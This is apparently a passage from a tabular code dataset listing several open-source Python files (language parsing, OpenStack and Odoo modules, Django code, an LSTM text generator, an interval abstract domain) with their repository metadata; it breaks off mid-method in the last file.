text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2011 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import UnicodeMixin, base_text_type, u, s
from guessit.fileutils import load_file_in_same_dir
from guessit.country import Country
import re
import logging
__all__ = [ 'is_iso_language', 'is_language', 'lang_set', 'Language',
'ALL_LANGUAGES', 'ALL_LANGUAGES_NAMES', 'UNDETERMINED',
'search_language' ]
log = logging.getLogger(__name__)
# downloaded from http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
#
# Description of the fields:
# "An alpha-3 (bibliographic) code, an alpha-3 (terminologic) code (when given),
# an alpha-2 code (when given), an English name, and a French name of a language
# are all separated by pipe (|) characters."
_iso639_contents = load_file_in_same_dir(__file__, 'ISO-639-2_utf-8.txt')
# drop the BOM from the beginning of the file
_iso639_contents = _iso639_contents[1:]
language_matrix = [ l.strip().split('|')
for l in _iso639_contents.strip().split('\n') ]
# update information in the language matrix
language_matrix += [['mol', '', 'mo', 'Moldavian', 'moldave'],
['ass', '', '', 'Assyrian', 'assyrien']]
for lang in language_matrix:
# remove unused languages that shadow other common ones with a non-official form
if (lang[2] == 'se' or # Northern Sami shadows Swedish
lang[2] == 'br'): # Breton shadows Brazilian
lang[2] = ''
# add missing information
if lang[0] == 'und':
lang[2] = 'un'
if lang[0] == 'srp':
lang[1] = 'scc' # from OpenSubtitles
lng3 = frozenset(l[0] for l in language_matrix if l[0])
lng3term = frozenset(l[1] for l in language_matrix if l[1])
lng2 = frozenset(l[2] for l in language_matrix if l[2])
lng_en_name = frozenset(lng for l in language_matrix
for lng in l[3].lower().split('; ') if lng)
lng_fr_name = frozenset(lng for l in language_matrix
for lng in l[4].lower().split('; ') if lng)
lng_all_names = lng3 | lng3term | lng2 | lng_en_name | lng_fr_name
lng3_to_lng3term = dict((l[0], l[1]) for l in language_matrix if l[1])
lng3term_to_lng3 = dict((l[1], l[0]) for l in language_matrix if l[1])
lng3_to_lng2 = dict((l[0], l[2]) for l in language_matrix if l[2])
lng2_to_lng3 = dict((l[2], l[0]) for l in language_matrix if l[2])
# we only return the first given english name, hoping it is the most used one
lng3_to_lng_en_name = dict((l[0], l[3].split('; ')[0])
for l in language_matrix if l[3])
lng_en_name_to_lng3 = dict((en_name.lower(), l[0])
for l in language_matrix if l[3]
for en_name in l[3].split('; '))
# we only return the first given french name, hoping it is the most used one
lng3_to_lng_fr_name = dict((l[0], l[4].split('; ')[0])
for l in language_matrix if l[4])
lng_fr_name_to_lng3 = dict((fr_name.lower(), l[0])
for l in language_matrix if l[4]
for fr_name in l[4].split('; '))
# contains a list of exceptions: strings that should be parsed as a language
# but which are not in an ISO form
lng_exceptions = { 'unknown': ('und', None),
'inconnu': ('und', None),
'unk': ('und', None),
'un': ('und', None),
'gr': ('gre', None),
'greek': ('gre', None),
'esp': ('spa', None),
'español': ('spa', None),
'se': ('swe', None),
'po': ('pt', 'br'),
'pb': ('pt', 'br'),
'pob': ('pt', 'br'),
'br': ('pt', 'br'),
'brazilian': ('pt', 'br'),
'català': ('cat', None),
'cz': ('cze', None),
'ua': ('ukr', None),
'cn': ('chi', None),
'chs': ('chi', None),
'jp': ('jpn', None),
'scr': ('hrv', None)
}
def is_iso_language(language):
return language.lower() in lng_all_names
def is_language(language):
return is_iso_language(language) or language in lng_exceptions
def lang_set(languages, strict=False):
"""Return a set of guessit.Language created from their given string
representation.
if strict is True, then this will raise an exception if any language
could not be identified.
"""
return set(Language(l, strict=strict) for l in languages)
class Language(UnicodeMixin):
"""This class represents a human language.
You can initialize it with pretty much anything, as it knows conversion
from ISO-639 2-letter and 3-letter codes, English and French names.
You can also distinguish languages for specific countries, such as
Portuguese and Brazilian Portuguese.
There are various properties on the language object that give you the
representation of the language for a specific usage, such as .alpha3
to get the ISO 3-letter code, or .opensubtitles to get the OpenSubtitles
language code.
>>> Language('fr')
Language(French)
>>> s(Language('eng').french_name)
'anglais'
>>> s(Language('pt(br)').country.english_name)
'Brazil'
>>> s(Language('Español (Latinoamérica)').country.english_name)
'Latin America'
>>> Language('Spanish (Latin America)') == Language('Español (Latinoamérica)')
True
>>> s(Language('zz', strict=False).english_name)
'Undetermined'
>>> s(Language('pt(br)').opensubtitles)
'pob'
"""
_with_country_regexp = re.compile('(.*)\((.*)\)')
_with_country_regexp2 = re.compile('(.*)-(.*)')
def __init__(self, language, country=None, strict=False, scheme=None):
language = u(language.strip().lower())
with_country = (Language._with_country_regexp.match(language) or
Language._with_country_regexp2.match(language))
if with_country:
self.lang = Language(with_country.group(1)).lang
self.country = Country(with_country.group(2))
return
self.lang = None
self.country = Country(country) if country else None
# first look for scheme specific languages
if scheme == 'opensubtitles':
if language == 'br':
self.lang = 'bre'
return
elif language == 'se':
self.lang = 'sme'
return
elif scheme is not None:
log.warning('Unrecognized scheme: "%s" - Proceeding with standard one' % scheme)
# look for ISO language codes
if len(language) == 2:
self.lang = lng2_to_lng3.get(language)
elif len(language) == 3:
self.lang = (language
if language in lng3
else lng3term_to_lng3.get(language))
else:
self.lang = (lng_en_name_to_lng3.get(language) or
lng_fr_name_to_lng3.get(language))
# general language exceptions
if self.lang is None and language in lng_exceptions:
lang, country = lng_exceptions[language]
self.lang = Language(lang).alpha3
self.country = Country(country) if country else None
msg = 'The given string "%s" could not be identified as a language' % language
if self.lang is None and strict:
raise ValueError(msg)
if self.lang is None:
log.debug(msg)
self.lang = 'und'
@property
def alpha2(self):
return lng3_to_lng2[self.lang]
@property
def alpha3(self):
return self.lang
@property
def alpha3term(self):
return lng3_to_lng3term[self.lang]
@property
def english_name(self):
return lng3_to_lng_en_name[self.lang]
@property
def french_name(self):
return lng3_to_lng_fr_name[self.lang]
@property
def opensubtitles(self):
if self.lang == 'por' and self.country and self.country.alpha2 == 'br':
return 'pob'
elif self.lang in ['gre', 'srp']:
return self.alpha3term
return self.alpha3
@property
def tmdb(self):
if self.country:
return '%s-%s' % (self.alpha2, self.country.alpha2.upper())
return self.alpha2
def __hash__(self):
return hash(self.lang)
def __eq__(self, other):
if isinstance(other, Language):
return self.lang == other.lang
if isinstance(other, base_text_type):
try:
return self == Language(other)
except ValueError:
return False
return False
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return self.lang != 'und'
def __unicode__(self):
if self.country:
return '%s(%s)' % (self.english_name, self.country.alpha2)
else:
return self.english_name
def __repr__(self):
if self.country:
return 'Language(%s, country=%s)' % (self.english_name, self.country)
else:
return 'Language(%s)' % self.english_name
UNDETERMINED = Language('und')
ALL_LANGUAGES = frozenset(Language(lng) for lng in lng_all_names) - frozenset([UNDETERMINED])
ALL_LANGUAGES_NAMES = lng_all_names
def search_language(string, lang_filter=None):
"""Looks for language patterns, and if found return the language object,
its group span and an associated confidence.
you can specify a list of allowed languages using the lang_filter argument,
as in lang_filter = [ 'fr', 'eng', 'spanish' ]
>>> search_language('movie [en].avi')
(Language(English), (7, 9), 0.8)
>>> search_language('the zen fat cat and the gay mad men got a new fan', lang_filter = ['en', 'fr', 'es'])
(None, None, None)
"""
# list of common words which could be interpreted as languages, but which
# are far too common to be able to say they represent a language in the
# middle of a string (where they most likely carry their commmon meaning)
lng_common_words = frozenset([
# english words
'is', 'it', 'am', 'mad', 'men', 'man', 'run', 'sin', 'st', 'to',
'no', 'non', 'war', 'min', 'new', 'car', 'day', 'bad', 'bat', 'fan',
'fry', 'cop', 'zen', 'gay', 'fat', 'cherokee', 'got', 'an', 'as',
'cat', 'her', 'be', 'hat', 'sun', 'may', 'my', 'mr',
# french words
'bas', 'de', 'le', 'son', 'vo', 'vf', 'ne', 'ca', 'ce', 'et', 'que',
'mal', 'est', 'vol', 'or', 'mon', 'se',
# spanish words
'la', 'el', 'del', 'por', 'mar',
# other
'ind', 'arw', 'ts', 'ii', 'bin', 'chan', 'ss', 'san', 'oss', 'iii',
'vi'
])
sep = r'[](){} \._-+'
if lang_filter:
lang_filter = lang_set(lang_filter)
slow = ' %s ' % string.lower()
confidence = 1.0 # for all of them
for lang in lng_all_names:
if lang in lng_common_words:
continue
pos = slow.find(lang)
if pos != -1:
end = pos + len(lang)
# make sure our word is always surrounded by separators
if slow[pos - 1] not in sep or slow[end] not in sep:
continue
language = Language(slow[pos:end])
if lang_filter and language not in lang_filter:
continue
# only allow those languages that have a 2-letter code, those who
# don't are too esoteric and probably false matches
if language.lang not in lng3_to_lng2:
continue
# confidence depends on lng2, lng3, english name, ...
if len(lang) == 2:
confidence = 0.8
elif len(lang) == 3:
confidence = 0.9
else:
# Note: we could either be really confident that we found a
# language or assume that full language names are too
# common words
confidence = 0.3 # going with the low-confidence route here
return language, (pos - 1, end - 1), confidence
return None, None, None
| nabsboss/CouchPotatoServer | libs/guessit/language.py | Python | gpl-3.0 | 13,102 | 0.003207 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Midokura Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova import log as logging
LOG = logging.getLogger('nova.api.openstack.compute.contrib.server_start_stop')
class ServerStartStopActionController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(ServerStartStopActionController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('os-start')
def _start_server(self, req, id, body):
"""Start an instance. """
context = req.environ['nova.context']
try:
LOG.debug(_("start instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.start(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
@wsgi.action('os-stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
try:
LOG.debug(_("stop instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.stop(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
class Server_start_stop(extensions.ExtensionDescriptor):
"""Start/Stop instance compute API support"""
name = "ServerStartStop"
namespace = "http://docs.openstack.org/compute/ext/servers/api/v1.1"
updated = "2012-01-23:00:00+00:00"
def get_controller_extensions(self):
controller = ServerStartStopActionController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| rcbops/nova-buildpackage | nova/api/openstack/compute/contrib/server_start_stop.py | Python | apache-2.0 | 2,721 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def populate_target_amount(apps, schema_editor):
Entry = apps.get_model("momentum", "Entry")
for entry in Entry.objects.all():
entry.target_amount = entry.goal.target_amount
entry.save()
class Migration(migrations.Migration):
dependencies = [
('momentum', '0009_entry_target_amount'),
]
operations = [
migrations.RunPython(populate_target_amount),
]
| mod2/momentum | momentum/migrations/0010_target_data_migration.py | Python | mit | 517 | 0.003868 |
"""Builder for websites."""
import string
from regolith.dates import date_to_float
doc_date_key = lambda x: date_to_float(
x.get("year", 1970), x.get("month", "jan")
)
ene_date_key = lambda x: date_to_float(
x.get("end_year", 4242), x.get("end_month", "dec")
)
category_val = lambda x: x.get("category", "<uncategorized>")
level_val = lambda x: x.get("level", "<no-level>")
id_key = lambda x: x.get("_id", "")
def date_key(x):
if "end_year" in x:
v = date_to_float(
x["end_year"], x.get("end_month", "jan"), x.get("end_day", 0)
)
elif "year" in x:
v = date_to_float(x["year"], x.get("month", "jan"), x.get("day", 0))
elif "begin_year" in x:
v = date_to_float(
x["begin_year"], x.get("begin_month", "jan"), x.get("begin_day", 0)
)
else:
raise KeyError("could not find year in " + str(x))
return v
POSITION_LEVELS = {
"": -1,
"editor": -1,
"unknown": -1,
"undergraduate research assistant": 1,
"intern": 1,
"masters research assistant": 2,
"visiting student": 1,
"graduate research assistant": 3,
"teaching assistant": 3,
"research assistant": 2,
"post-doctoral scholar": 4,
"research fellow": 4,
"assistant scientist": 4,
"assistant lecturer": 4,
"lecturer": 5,
"research scientist": 4.5,
"associate scientist": 5,
"adjunct scientist": 5,
"senior assistant lecturer": 5,
"research associate": 5,
"reader": 5,
"ajunct professor": 5,
"adjunct professor": 5,
"consultant": 5,
"programer": 5,
"programmer": 5,
"visiting scientist": 6,
"research assistant professor": 4,
"assistant professor": 8,
"assistant physicist": 8,
"associate professor": 9,
"associate physicist": 9,
"professor emeritus": 9,
"visiting professor": 9,
"manager": 10,
"director": 10,
"scientist": 10,
"engineer": 10,
"physicist": 10,
"professor": 11,
"president": 10,
"distinguished professor": 12
}
def position_key(x):
"""Sorts a people based on thier position in the research group."""
pos = x.get("position", "").lower()
first_letter_last = x.get("name", "zappa").rsplit(None, 1)[-1][0].upper()
backward_position = 26 - string.ascii_uppercase.index(first_letter_last)
return POSITION_LEVELS.get(pos, -1), backward_position
| scopatz/regolith | regolith/sorters.py | Python | cc0-1.0 | 2,389 | 0.002093 |
#!/usr/bin/env python3
header = """
..
DO NOT EDIT: This file was automatically generated by running doc/acknowledge.py
Edit doc/acknowledge.py, doc/funding.csv, and doc/citing-pism.bib
"""
acknowledgement = """
Acknowledging PISM funding sources
----------------------------------
If you use PISM in a publication then we ask for an acknowledgement of funding and a
citation. However, unless PISM developers are involved in the preparation of the
publication at the usual co-author level, we do not expect co-authorship on PISM-using
papers.
To acknowledge PISM funding please include the statement:
"""
citing = """
Citing
------
To cite PISM please use at least one of Bueler and Brown (2009) or Winkelmann et al.
(2011), below, as appropriate to the application.
Do not forget to specify the PISM *version* you use. If your results came from source code
modifications to PISM then we request that your publication say so explicitly.
If your study relies heavily on certain PISM sub-models (such as hydrology, calving,
fracture mechanics, thermodynamics) please contact the corresponding author/developer for
information on additional citations.
.. code::
"""
import csv
import time
import sys
import argparse
parser = argparse.ArgumentParser()
parser.description = '''Generate a funding acknowledgment string.'''
parser.add_argument("--manual", action="store_true")
options = parser.parse_args()
year = time.gmtime(time.time())[0]
funding = {}
with open("funding.csv", "r") as f:
reader = csv.reader(f, skipinitialspace=True, quoting=csv.QUOTE_ALL)
funding = {}
for row in reader:
start_year, end_year, agency, number, _ = row
try:
start_year = int(start_year)
end_year = int(end_year)
except:
continue
# skip grants for which we don't have a number (yet)
if number.strip() == "":
continue
if start_year <= year and year <= end_year:
try:
funding[agency].append(number)
except:
funding[agency] = [number]
def join(strings):
assert len(strings) > 0
if len(strings) == 1:
return strings[0]
elif len(strings) == 2:
return "{} and {}".format(strings[0], strings[1])
else:
return join(["{}, {}".format(strings[0], strings[1]),
join(strings[2:])])
grants = []
for k, v in funding.items():
grant = "grant"
if len(v) > 1:
grant = "grants"
grants.append("{agency} {grant} {number}".format(agency=k,
grant=grant,
number=join(v)))
if options.manual:
print(header)
print("""
Development of PISM is supported by {grants}.""".format(grants=join(grants)))
else:
print(header)
print(acknowledgement)
print("""
Development of PISM is supported by {grants}.
""".format(grants=join(grants)))
print(citing)
with open("citing-pism.bib") as f:
for line in f:
sys.stdout.write(" {}".format(line))
| pism/pism | doc/acknowledge.py | Python | gpl-3.0 | 3,113 | 0.004497 |
# -*- coding: utf-8 -*-
# © 2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from psycopg2 import ProgrammingError
from openerp.modules.registry import RegistryManager
from openerp.tools import config
from openerp.tests.common import TransactionCase, at_install, post_install
# Use post_install to get all models loaded more info: odoo/odoo#13458
@at_install(False)
@post_install(True)
class TestDatabaseCleanup(TransactionCase):
def setUp(self):
super(TestDatabaseCleanup, self).setUp()
self.module = None
self.model = None
def test_database_cleanup(self):
# create an orphaned column
self.cr.execute(
'alter table res_partner add column database_cleanup_test int')
# We need use a model that is not blocked (Avoid use res.users)
partner_model = self.env['ir.model'].search([
('model', '=', 'res.partner')], limit=1)
purge_columns = self.env['cleanup.purge.wizard.column'].create({
'purge_line_ids': [(0, 0, {
'model_id': partner_model.id, 'name': 'database_cleanup_test'}
)]})
purge_columns.purge_all()
# must be removed by the wizard
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
cr.execute('select database_cleanup_test from res_partner')
# create a data entry pointing nowhere
self.cr.execute('select max(id) + 1 from res_users')
self.env['ir.model.data'].create({
'module': 'database_cleanup',
'name': 'test_no_data_entry',
'model': 'res.users',
'res_id': self.cr.fetchone()[0],
})
purge_data = self.env['cleanup.purge.wizard.data'].create({})
purge_data.purge_all()
# must be removed by the wizard
with self.assertRaises(ValueError):
self.env.ref('database_cleanup.test_no_data_entry')
# create a nonexistent model
self.model = self.env['ir.model'].create({
'name': 'Database cleanup test model',
'model': 'x_database.cleanup.test.model',
})
self.env.cr.execute(
'insert into ir_attachment (name, res_model, res_id, type) values '
"('test attachment', 'database.cleanup.test.model', 42, 'binary')")
self.registry.models.pop('x_database.cleanup.test.model')
self.registry._pure_function_fields.pop(
'x_database.cleanup.test.model')
purge_models = self.env['cleanup.purge.wizard.model'].create({})
with self.assertRaisesRegexp(KeyError,
'x_database.cleanup.test.model'):
# TODO: Remove with-assert of KeyError after fix:
# https://github.com/odoo/odoo/pull/13978/files#r88654967
purge_models.purge_all()
# must be removed by the wizard
self.assertFalse(self.env['ir.model'].search([
('model', '=', 'x_database.cleanup.test.model'),
]))
# create a nonexistent module
self.module = self.env['ir.module.module'].create({
'name': 'database_cleanup_test',
'state': 'to upgrade',
})
purge_modules = self.env['cleanup.purge.wizard.module'].create({})
# this reloads our registry, and we don't want to run tests twice
# we also need the original registry for further tests, so save a
# reference to it
original_registry = RegistryManager.registries[self.env.cr.dbname]
config.options['test_enable'] = False
purge_modules.purge_all()
config.options['test_enable'] = True
# must be removed by the wizard
self.assertFalse(self.env['ir.module.module'].search([
('name', '=', 'database_cleanup_test'),
]))
# reset afterwards
RegistryManager.registries[self.env.cr.dbname] = original_registry
# create an orphaned table
self.env.cr.execute('create table database_cleanup_test (test int)')
purge_tables = self.env['cleanup.purge.wizard.table'].create({})
purge_tables.purge_all()
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
self.env.cr.execute('select * from database_cleanup_test')
def tearDown(self):
super(TestDatabaseCleanup, self).tearDown()
with self.registry.cursor() as cr2:
# Release blocked tables with pending deletes
self.env.cr.rollback()
if self.module:
cr2.execute(
"DELETE FROM ir_module_module WHERE id=%s",
(self.module.id,))
if self.model:
cr2.execute(
"DELETE FROM ir_model WHERE id=%s",
(self.model.id,))
cr2.commit()
| be-cloud-be/horizon-addons | server-tools/database_cleanup/tests/test_database_cleanup.py | Python | agpl-3.0 | 4,939 | 0 |
from .howdoi import command_line_runner
command_line_runner()
| gleitz/howdoi | howdoi/__main__.py | Python | mit | 63 | 0 |
from django.core.urlresolvers import reverse
from django.test import TestCase
class SmokeTestMeanCoach(TestCase):
def test_index_page_returns_200(self):
resp = self.client.get(reverse('meancoach:index'))
assert resp.status_code == 200
| dev-coop/meancoach | meancoach_project/apps/meancoach/tests/smoke_tests.py | Python | mit | 258 | 0 |
#!/usr/bin/python
# coding: utf8
import os
import subprocess
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}'.commands.base import BaseCommand
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}' import PROJECT_DIR
class Configure(BaseCommand):
def execute(self):
os.chdir(os.path.join(PROJECT_DIR, 'build'))
subprocess.run(['cmake', PROJECT_DIR])
| antoinedube/numeric-cookiecutter | {{cookiecutter.namespace+'.'+cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/commands/configure.py | Python | gpl-3.0 | 571 | 0.003503 |
import sys
import re
import numpy as np
import json
import pickle
from string import ascii_letters
from keras.models import Sequential, model_from_json
from keras.layers import Dense, Activation, Dropout
from keras.layers import LSTM
from ivanatrumpalot import clean_text, predict, sample
# This code is heavily influenced by the Keras example code on LSTM for text generation :
# https://github.com/fchollet/keras/blob/master/examples/lstm_text_generation.py
# USAGE :
# python train_lstm.py [mode]
# If no arguments are passed, this will train a new model, saving the model's architecture
# to model.json and its weights to weights.h5.
# If [mode] is passed, valid options are "extend" and "predict".
# If the string "extend" is passed, they must be the files saved by train_lstm.py previously.
# If the string "predict" is passed,
# Code directory
os.chdir("/root/ivanatrumpalot/code")
# Read and clean corpus
text = clean_text(open("../data/trump_corpus").read())
# Corpus length
print("Corpus : {} characters, approximately {} sentences.".format(len(text), len(text.split("."))))
# Generate a dictionaries mapping from characters in our alphabet to an index, and the reverse
alphabet = set(text).union(set(ascii_letters)).union(set("1234567890"))
alphabet_size = len(alphabet)
alphabet_indices = dict((c, i) for i, c in enumerate(alphabet))
indices_alphabet = dict((i, c) for i, c in enumerate(alphabet))
print("Size of the alphabet : {} characters.".format(alphabet_size))
# Generate sequences of characters that the RNN will use to predict the next character.
primer_length = 50
step = 3
sentences = []
next_character = []
for i in range(0, len(text) - primer_length, step):
sentences.append(text[i : i + primer_length])
next_character.append(text[i + primer_length])
print("Number of sequences generated from the corpus : {}.".format(len(sentences)))
# Vectorise the text sequences : go from N sentences of length primer_length to
# a binary array of size (N, primer_length, alphabet_size). Do the same for the
# next_character array.
print("Vectorising.")
X = np.zeros((len(sentences), primer_length, alphabet_size), dtype=np.bool)
y = np.zeros((len(sentences), alphabet_size), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, alphabet_indices[char]] = 1
y[i, alphabet_indices[next_character[i]]] = 1
# Pickle the necessary objects for future prediction
required_objects = { "alphabet" : alphabet,
"alphabet_indices" : alphabet_indices,
"indices_alphabet" : indices_alphabet,
"primer_length" : primer_length
}
with open("required_objects.pickle", "wb") as f:
pickle.dump(required_objects, f)
# The current model is a four-layer LSTM network with a dropout layer between each hidden layer.
print("Building the model.")
model = Sequential()
model.add(LSTM(128, return_sequences=True, init="glorot_uniform",
input_shape=(primer_length, len(alphabet))))
model.add(Dropout(0.2))
model.add(LSTM(256, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(Dense(len(alphabet)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.summary()
# Train the model for 250 epochs, outputting some generated text every five iterations
# Save the model every five epochs, just in case training is interrupted
for iteration in range(1, 50):
print("\n" + "-" * 50)
print("Iteration {}".format(iteration))
# Train the model for five epochs
model.fit(X, y, batch_size=128, nb_epoch=5, shuffle=True)
# Pick a random part of the text to use as a prompt
start_index = np.random.randint(0, len(text) - primer_length - 1)
# For various energies in the probability distribution,
# create some 200-character sample strings
for diversity in [0.2, 0.5, 1.0, 1.2]:
print("\n----- Diversity : {}".format(diversity))
generated = ""
sentence = text[start_index : start_index + primer_length]
generated += sentence
print("----- Generating with prompt : {}".format(sentence))
sys.stdout.write(generated)
# Generate 100 characters
for i in range(100):
x = np.zeros((1, primer_length, len(alphabet)))
for t, char in enumerate(sentence):
x[0, t, alphabet_indices[char]] = 1.
predictions = model.predict(x, verbose=0)[0]
next_index = sample(predictions, diversity)
next_char = indices_alphabet[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print("\n")
# Save the model architecture and weights to file
model.save_weights("weights.h5", overwrite=True)
with open("model.json", "w") as f:
f.write(model.to_json())
| QCaudron/ivanatrumpalot | code/train_lstm.py | Python | mit | 5,169 | 0.003289 |
import os.path
import shutil
try:
import OWGUI
except ImportError:
print "Orange could not be imported."
try:
import pynopticon
except ImportError:
print "Pynopticon could not be imported, you need to install it first."
def link_to_orange():
orangeWidgetsPath = os.path.join(os.path.split(OWGUI.__file__)[0], 'Pynopticon')
pncWidgetsPath = os.path.join(pynopticon.__path__[0], 'widgets')
print "Copying pynopticon widgets to orange widgets directory..."
shutil.copytree(pncWidgetsPath, orangeWidgetsPath)
print "Successfull"
if __name__=='__main__':
link_to_orange()
| hksonngan/pynopticon | src/pynopticon/link_to_orange.py | Python | gpl-3.0 | 628 | 0.012739 |
from collections import defaultdict
def check_for_hits(planets, counts):
total = 0
for planet in planets():
if counts(planet):
total += 1
return total
def parse():
actions = {"U": (lambda: map_x[x], lambda j: j > y),
"D": (lambda: map_x[x], lambda j: j < y),
"L": (lambda: map_y[y], lambda j: j < x),
"R": (lambda: map_y[y], lambda j: j > x) }
for x in range(1, 8):
file_name = "%02d" % x
input_file = open(file_name + ".in")
lines = input_file.read().splitlines()
planets, ships = lines[0].split(" ")
map_x = defaultdict(list)
map_y = defaultdict(list)
for i in range(1, int(planets) + 1):
x, y = [int(k) for k in lines[i].split(" ")]
map_x[x] += [y]
map_y[y] += [x]
start = int(planets) + 1
hit_list = []
for i in range(start, start + int(ships)):
x, y, direction = lines[i].split(" ")
x, y = int(x), int(y)
action = actions[direction]
if not action:
raise "Invalid direction value %s" % direction
hits = check_for_hits(action[0], action[1])
hit_list.append(hits)
output_file = open(file_name + ".out")
should_be = [int(k) for k in output_file.readlines()]
assert hit_list == should_be
if __name__ == '__main__':
parse()
| Krigu/python_fun | Pland1/Parser.py | Python | gpl-3.0 | 1,456 | 0.000687 |
# Create your views here.
from django.contrib.auth.decorators import login_required
from core.models import *
from django.http import HttpResponse
from core.services import watch_services
from django.utils.translation import ugettext as _
@login_required
def watchIssue(request, issue_id):
watch_services.watch_issue(request.user, int(issue_id), Watch.WATCHED)
return HttpResponse('WATCHING')
@login_required
def unwatchIssue(request, issue_id):
watch_services.unwatch_issue(request.user, int(issue_id))
return HttpResponse('NOT_WATCHING')
| stonestone/stonefreedomsponsors | djangoproject/core/views/watch_views.py | Python | agpl-3.0 | 558 | 0.003584 |
from copy import deepcopy
from math import inf
from numbers import Number
from typing import List, Union
from abstract_domains.lattice import BottomMixin
from abstract_domains.numerical.numerical import NumericalMixin
from abstract_domains.state import State
from abstract_domains.store import Store
from core.expressions import *
from core.expressions_tools import ExpressionVisitor
def _auto_convert_numbers(func):
def func_wrapper(self, other: Union[Number, 'Interval']):
if isinstance(other, Number):
other = Interval(other, other)
return func(self, other)
return func_wrapper
def _check_types(func):
def func_wrapper(self, other: 'Interval'):
if not issubclass(self.__class__, Interval) or not issubclass(other.__class__, Interval):
return NotImplemented
return func(self, other)
return func_wrapper
def _check_non_empty(func):
def func_wrapper(self, other: 'Interval'):
if self.empty() or other.empty():
raise ValueError("Empty intervals are not comparable!")
return func(self, other)
return func_wrapper
class Interval:
def __init__(self, lower=-inf, upper=inf):
"""Create an interval lattice for a single variable.
"""
super().__init__()
assert lower is not None and upper is not None
self._lower = lower
self._upper = upper
@staticmethod
def from_constant(constant):
interval = Interval(constant, constant)
return interval
@property
def lower(self):
if self.empty():
return None
else:
return self._lower
@lower.setter
def lower(self, b):
assert b is not None
self._lower = b
@property
def upper(self):
if self.empty():
return None
else:
return self._upper
@upper.setter
def upper(self, b):
assert b is not None
self._upper = b
@property
def interval(self):
if self.empty():
return None
else:
return self.lower, self.upper
@interval.setter
def interval(self, bounds):
(lower, upper) = bounds
self.lower = lower
self.upper = upper
def empty(self) -> bool:
"""Return `True` if this interval is empty."""
return self._lower > self._upper
def set_empty(self) -> 'Interval':
"""Set this interval to be empty."""
self.interval = (1, 0)
return self
def finite(self) -> bool:
"""Return `True` if this interval is finite."""
return not ({self.lower, self.upper} & {-inf, inf})
def is_constant(self) -> bool:
"""Return `True` if this interval is equal to a single constant (different from infinity)."""
return self.lower == self.upper
@_check_types
def __eq__(self, other: 'Interval'):
return repr(self) == repr(other)
@_check_types
def __ne__(self, other: 'Interval'):
return not (self == other)
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __lt__(self, other):
return self.upper < other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __le__(self, other):
return self.upper <= other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __gt__(self, other):
return self.lower > other.upper
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __ge__(self, other):
return self.lower >= other.upper
def __hash__(self):
return hash(repr(self))
def __repr__(self):
if self.empty():
return "∅"
else:
return f"[{self.lower},{self.upper}]"
# operators (they mutate self, no copy is made!!)
@_auto_convert_numbers
@_check_types
def add(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower + other.lower, self.upper + other.upper)
return self
@_auto_convert_numbers
@_check_types
def sub(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
